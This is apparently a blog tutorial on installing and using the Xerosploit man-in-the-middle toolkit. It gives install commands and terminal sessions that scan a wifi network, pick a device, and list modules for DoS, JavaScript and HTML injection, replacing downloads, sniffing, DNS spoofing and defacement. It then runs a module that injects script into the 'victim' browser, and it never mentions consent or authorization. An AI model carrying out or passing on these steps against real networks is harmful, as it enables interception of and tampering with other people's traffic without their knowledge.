Xerosploit - Advanced man-in-the-middle attack

Table of Contents

Xerosploit – A man-in-the-middle attack or MITM attack is nothing but the take the control of surrounding Devices on the same wifi network. This attack can spy on networks and make modify certain things.

Xerosploit is one of the best tools for man-in-the-middle attacks but this tool can’t attack all websites because nowadays most websites are using HTTPS.

Some sites can still be accessing the HTTP because they are not redirecting HTTPS

How to install and use Xerosploit?

Install Xerosploit

First of all, we need to download the Xeros-ploit tool so type the below command in your Linux terminal

									git clone https://github.com/LionSec/xerosploit.git				

Xerosploit – Advanced man-in-the-middle attack

Then, change into its directory to using the cd command

									cd xerosploit				

Xerosploit – Advanced man-in-the-middle attack

Now run the installer file using python2. then choose which operating system you used, in my case, I used Linux, so I choose, 1st option

									sudo python2 install.py				

Xerosploit – Advanced man-in-the-middle attack

Install the Dependencies

For This tool need some Dependencies to run without error so execute the following command in your Linux terminal.

									sudo apt install nmap hping3 build-essential ruby-dev libpcap-dev libgmp3-dev				

install dependies

Now we need to install the “tabulate and terminal tables“, which will help you to display the Xerosploit information without error.

									sudo pip3 install tabulate terminaltables				

Xerosploit – Advanced man-in-the-middle attack

Xerosploit commands

Start the Xerosploit tool with the Xerosploit command

									~/xerosploit$ sudo xerosploit        ▄  ▄███▄   █▄▄▄▄ ████▄    ▄▄▄▄▄   █ ▄▄  █     ████▄ ▄█    ▄▄▄▄▀    ▀▄   █ █▀   ▀  █  ▄▀ █   █   █     ▀▄ █   █ █     █   █ ██ ▀▀▀ █      █ ▀  ██▄▄    █▀▀▌  █   █ ▄  ▀▀▀▀▄   █▀▀▀  █     █   █ ██     █     ▄ █   █▄   ▄▀ █  █  ▀████  ▀▄▄▄▄▀    █     ███▄  ▀████ ▐█    █    █   ▀▄ ▀███▀     █                     █        ▀        ▐   ▀     ▀              ▀                       ▀[+]═══════════[ Author : @LionSec1 _-|/-_ Website: www.neodrix.com ]═══════════[+]                      [ Powered by Bettercap and Nmap ]┌═════════════════════════════════════════════════════════════════════════════┐█                                                                             ██                         Your Network Configuration                          ██                                                                             █└═════════════════════════════════════════════════════════════════════════════┘╒════════════════════════════════════════════════════════════════════════════╤═══════════════════╤═════════════╤═════════╤═════════════╕│                                 IP Address                                 │    MAC Address    │   Gateway   │  Iface  │  Hostname   │╞════════════════════════════════════════════════════════════════════════════╪═══════════════════╪═════════════╪═════════╪═════════════╡├────────────────────────────────────────────────────────────────────────────┼───────────────────┼─────────────┼─────────┼─────────────┤│ 192.168.8.172 fd0b:ed07:cb03:10::3fa fd0b:ed07:cb03:10:dcf1:e71a:2dc3:299f │ 28:D2:44:23:54:2B │ 192.168.8.1 │  eth0   │ Macbook-Pro │╘════════════════════════════════════════════════════════════════════════════╧═══════════════════╧═════════════╧═════════╧═════════════╛╔═════════════╦════════════════════════════════════════════════════════════════════╗║             ║ Xerosploit is a penetration testing toolkit whose goal is to       ║║ Information ║ perform man in the middle attacks for testing purposes.            ║║             ║ It brings various modules that allow to realise efficient attacks. ║║             ║ This tool is Powered by Bettercap and Nmap.                        ║╚═════════════╩════════════════════════════════════════════════════════════════════╝[+] Please type 'help' to view commands.Xero ➮				

Now Type help to see all of the commands available in Xerosploit.

									Xero ➮ help╔══════════╦════════════════════════════════════════════════════════════════╗║          ║                                                                ║║          ║ scan : Map your network.                                       ║║          ║                                                                ║║          ║ iface : Manually set your network interface.                   ║║ COMMANDS ║                                                                ║║          ║ gateway : Manually set your gateway.                           ║║          ║                                                                ║║          ║ start : Skip scan and directly set your target IP address.     ║║          ║                                                                ║║          ║ rmlog : Delete all xerosploit logs.                            ║║          ║                                                                ║║          ║ help : Display this help message.                              ║║          ║                                                                ║║          ║ exit : Close Xerosploit.                                       ║║          ║                                                                ║╚══════════╩════════════════════════════════════════════════════════════════╝[+] Please type 'help' to view commands.Xero ➮				

Choose Target

Now type the “scan” command in your terminal. That will show all connected devices in your wifi network

									Xero ➮ scan[++} Mapping your network ...[+]═══════════[ Devices found on your network ]═══════════[+]╔═══════════════╦═══════════════════╦═══════════════════════════════╗║ IP Address    ║ Mac Address       ║ Manufacturer                  ║║═══════════════║═══════════════════║═══════════════════════════════║║ 192.168.8.1   ║ 94:83:C4:00:EB:C5 ║ (Unknown)                     ║║ 192.168.8.215 ║ B8:70:F4:AD:44:C8 ║ (Compal Information(kunshan)) ║║ 192.168.8.172 ║ 28:D2:44:12:23:6B ║ (This device)                 ║╚═══════════════╩═══════════════════╩═══════════════════════════════╝[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.Xero ➮				

Now choose your target IP address. Then type that IP address in your terminal

									Xero ➮ 192.168.8.215[++] 192.168.8.215 ha been targeted.[+] Which module do you want to load ? Enter 'help' for more information.Xero»modules ➮				

Now, it will ask you which module you want to run against the target. If you don’t know the module you want, type help to see a complete list.

									Xero»modules ➮ help╔═════════╦════════════════════════════════════════════════════════════════════╗║         ║                                                                    ║║         ║ pscan      : Port Scanner                                          ║║         ║                                                                    ║║         ║ dos        : DoS Attack                                            ║║         ║                                                                    ║║         ║ ping       : Ping Request                                          ║║         ║                                                                    ║║         ║ injecthtml : Inject Html code                                      ║║         ║                                                                    ║║         ║ injectjs   : Inject Javascript code                                ║║         ║                                                                    ║║         ║ rdownload  : Replace files being downloaded                        ║║         ║                                                                    ║║         ║ sniff      : Capturing information inside network packets          ║║ MODULES ║                                                                    ║║         ║ dspoof     : Redirect all the http traffic to the specified one IP ║║         ║                                                                    ║║         ║ yplay      : Play background sound in target browser               ║║         ║                                                                    ║║         ║ replace    : Replace all web pages images with your own one        ║║         ║                                                                    ║║         ║ driftnet   : View all images requested by your targets             ║║         ║                                                                    ║║         ║ move       : Shaking Web Browser content                           ║║         ║                                                                    ║║         ║ deface     : Overwrite all web pages with your HTML code           ║║         ║                                                                    ║╚═════════╩════════════════════════════════════════════════════════════════════╝[+] Which module do you want to load ? Enter 'help' for more information.Xero»modules ➮				

After choosing the module, just type the “run” command on your terminal. I will show one example 

Now I will choose the “move” module. This module shake your victim browser

									Xero»modules ➮ move┌══════════════════════════════════════════════════════════════┐█                                                              ██                           Shakescreen                        ██                                                              ██                   Shaking Web Browser content                █└══════════════════════════════════════════════════════════════┘[+] Enter 'run' to execute the 'move' command.Xero»modules»shakescreen ➮				
									Xero»modules»shakescreen ➮ run[++] Injecting shakescreen.js  ...[++] Press 'Ctrl + C' to stop.				

Now your victim browser get shake every scroll and move continuously



Download Github Tool

Post a Comment

أحدث أقدم